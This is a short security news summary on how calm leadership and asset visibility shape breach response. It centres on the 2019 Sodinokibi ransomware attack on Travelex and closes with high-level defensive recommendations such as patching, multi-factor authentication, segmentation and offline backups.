Calm Leadership and Asset Visibility Key to Effective Breach Response

TL;DR: Calm leadership and clear asset visibility are essential to limit damage during a cyber breach, according to former Travelex security architect Don Gibson and DXC Technology’s Lars Klinghammer. Their advice stems from the 2019 Sodinokibi ransomware attack that crippled Travelex’s global currency exchange operations.

Context

When a breach occurs, technical confusion can quickly spiral into a business, legal, and reputational crisis. Early decisions shape long‑term recovery, yet many teams struggle to act with speed and clarity. Gibson and Klinghammer highlighted these challenges during a recent ISMG discussion on breach anatomy.

Key Facts

Gibson, who served as security architect at Travelex during the December 2019 incident, recalls that leaders must set aside personal feelings and become a calm, clear voice for the organization. The attackers used the Sodinokibi (REvil) ransomware, gaining initial access through an unpatched Pulse Secure VPN vulnerability (CVE‑2019‑11510). Once inside, they moved laterally using valid credentials, deployed PowerShell scripts (MITRE ATT&CK T1059.001), and encrypted files across critical systems (T1486). The ransom demand was $6 million in Bitcoin; Travelex ultimately paid about $2.3 million. The attack shut down foreign‑exchange services in over 30 countries, affected roughly 5,000 employees, and exposed personal data of an undisclosed number of customers.

Klinghammer warned that lacking visibility into assets and network activity hampers effective defense. Without knowing what devices exist or what traffic is normal, defenders cannot spot anomalies early enough to stop ransomware deployment.

What It Means

Organizations should treat breach response as a leadership and visibility problem, not just a technical one. Leaders must communicate factually and calmly to prevent panic, while security teams maintain accurate asset inventories and network maps. Immediate actions include applying the Pulse Secure VPN patch for CVE‑2019‑11510, enforcing multi‑factor authentication on remote access, and segmenting networks to limit lateral movement. Detection should focus on unusual PowerShell usage, unauthorized credential use, and rapid file encryption patterns. Maintaining offline, tested backups ensures recovery without paying ransom. Finally, regularly test incident‑response playbooks that incorporate clear communication chains and asset‑discovery steps.

Watch for evolving ransomware tactics that target cloud‑based identity services and for updated advisories on zero‑trust network architectures as defenders sharpen visibility and response readiness.